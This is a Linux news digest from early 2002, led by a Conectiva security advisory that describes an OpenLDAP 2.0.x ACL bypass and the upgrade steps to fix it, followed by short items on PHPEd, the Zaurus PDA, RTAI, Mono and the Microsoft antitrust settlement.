Connectiva: “Thomas Fritz reported[3] a vulnerability in the ldap server which could be exploited by remote attackers to delete attributes from an object even if those attributes were protected by ACLs.”

--------------------------------------------------------------------------
CONECTIVA LINUX SECURITY ANNOUNCEMENT
--------------------------------------------------------------------------

PACKAGE   : openldap
SUMMARY   :
DATE      : 2002-01-28 12:17:00
ID        : CLA-2002:459
RELEVANT
RELEASES  : 6.0, 7.0

-------------------------------------------------------------------------

DESCRIPTION
 OpenLDAP[1] is an LDAPv2 and LDAPv3 server available for several
 platforms.

 Thomas Fritz reported[3] a vulnerability in the ldap server which
 could be exploited by remote attackers to delete attributes from an
 object even if those attributes were protected by ACLs.

 Authenticated users (in openldap versions 2.0.8 up to 2.0.19) could
 issue a REPLACE command for an attribute where the new value is an
 empty one, thus effectively removing the attribute if allowed by the
 current schema, that is, if the attribute in question is not
 mandatory. In versions prior to 2.0.8, anonymous users could do this
 as well, regardless of ACLs protecting this attribute.

 The OpenLDAP project has released[2] a new version to address this
 vulnerability. OpenLDAP 1.2.x is not affected by this vulnerability,
 only the specified 2.0.x releases.



SOLUTION
 It is recommended that all OpenLDAP 2.0.x users upgrade their
 packages. If the service is already running, the upgrade will
 automatically restart it.


 REFERENCES
 1.  http://www.openldap.org
2.
  http://www.openldap.org/lists/openldap-announce/200201/msg00002.html
3.  http://www.openldap.org/lists/openldap-bugs/200201/msg00049.html
4.  http://www.securityfocus.com/bid/3945


DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES 
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/openldap2-2.0.21-1U60_1cl.src.rpmftp://atualizacoes.conectiva.com.br/6.0/RPMS/openldap2-2.0.21-1U60_1cl.i386.rpmftp://atualizacoes.conectiva.com.br/6.0/RPMS/openldap2-devel-2.0.21-1U60_1cl.i386.rpmftp://atualizacoes.conectiva.com.br/6.0/RPMS/openldap2-tests-2.0.21-1U60_1cl.i386.rpmftp://atualizacoes.conectiva.com.br/7.0/SRPMS/openldap-2.0.21-1U70_2cl.src.rpmftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-2.0.21-1U70_2cl.i386.rpmftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-client-2.0.21-1U70_2cl.i386.rpmftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-devel-2.0.21-1U70_2cl.i386.rpmftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-devel-static-2.0.21-1U70_2cl.i386.rpmftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-doc-2.0.21-1U70_2cl.i386.rpmftp://atualizacoes.conectiva.com.br/7.0/RPMS/openldap-server-2.0.21-1U70_2cl.i386.rpm


ADDITIONAL INSTRUCTIONS
 Users of Conectiva Linux version 6.0 or higher may use apt to perform
 upgrades of RPM packages:
 - add the following line to /etc/apt/sources.list if it is not there yet
   (you may also use linuxconf to do this):

 rpm [cncbr]  ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates

(replace 6.0 with the correct version number if you are not running CL6.0)

 - run:                 apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions reagarding the use of apt and upgrade examples
 can be found at  http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


-------------------------------------------------------------------------
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at 
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at  http://distro.conectiva.com.br/seguranca/politica/?idioma=en
-------------------------------------------------------------------------
All our advisories and generic update instructions can be viewed at 
http://distro.conectiva.com.br/atualizacoes/?idioma=en

-------------------------------------------------------------------------
subscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br
unsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br

BusinessWire: “At LinuxWorld New York, NuSphere is showcasing a new Linux-based version of its award-winning Nusphere(R) PHPEd(TM) product, an IDE (Integrated Development Environment) that integrates the scripting language PHP and a comprehensive set of editing, debugging and deployment tools to speed development time by up to 75 percent and significantly reduce time-to-market.” Read more here.

MozillaQuest Magazine (MozillaQuest.com) reports: “Not all wireless-network PC Card adapters are supported for the Linux operating system (OS) by their manufacturers . . . Even if you have either a vendor or third-party supplied Linux driver for a wireless-network PC Card, getting that wireless PC Card to work with your Linux installation can be tricky . . .Today, we successfully use a third-party driver to run a wireless-network PC Card on a Linux-based notebook computer. An important Part of doing this is editing the PCMCIA startup-script. That’s necessary so the Linux boot process will automatically load the wireless PC Card at boot time.”
Check this MozillaQuest.com story for the details and full story!

Anonymous Reader writes, “Sharp’s new Linux-based Zaurus PDA is expected to begin hitting retail
shelves this March for a list price $549, a company source told LinuxDevices.com. The model name will be ‘Zaurus SL-5500,’ and it will include 64MB of RAM memory and 16MB of built-in Flash storage memory (in contrast to pre-production devices which had 32MB of RAM). More details are here at LinuxDevices.com.”

Anonymous Reader writes, “Mojolin announces an affiliate program open to linux and unix community webmasters. The full announcement is here:
press release.”

Posted at LWN.net: “The RTAI development team would like to announce the availability
of RTAI 24.1.8 which now includes support for 3 architectures: i386,
PPC and MIPS. With that said, the RTAI development team would
like to remind everyone that the continuing FUD regarding RTAI’s
status in regards to the RTLinux patent is not warranted. To that
effect, the following contains a statement by Eben Moglen, the FSF’s
legal counsel, dismissing any possible doubts about RTAI’s use.”

Anonymous Reader writes, “Scott Wimer, CTO Cylant Software, discusses methods for improving the security of a computer system in spite of their vulnerabilities in order to break out of the current security cycle.

The software you depend on contains security vulnerabilities. Not all of these vulnerabilities have been found yet. Some are known only to ‘black hat’ hackers, a trump card they can play against your organization if and when they choose to.
This is not alarmism. It is an honest and rational statement of the current security risk born by organizations with networked computer systems.” It’s at Linux.box.org.

C|Net reports that Red Hat will begin offering a higher-end
and more specialized version of Linux later this year that won’t be as easy to find as
the current all-purpose package.

IDG News Service reports that Intel and Hewlett-Packard say they will lend support to an
effort to create an Open Source version of Microsoft’s .Net initiative, called Mono.

Advogato.org comments on the Microsoft antitrust settlement. “I believe that it is the responsibility of the Department of Justice, and not Microsoft, to protect the economic interests of the
computer industry by protecting competetion and innovation. The DOJ strongly argued for this position in its suit against
Microsoft, but in its recent settlement it has reversed its position, apparently concluding that what is good for Microsoft is
good for the software industry. If the DOJ truly believes this, then it should appeal the current verdict.”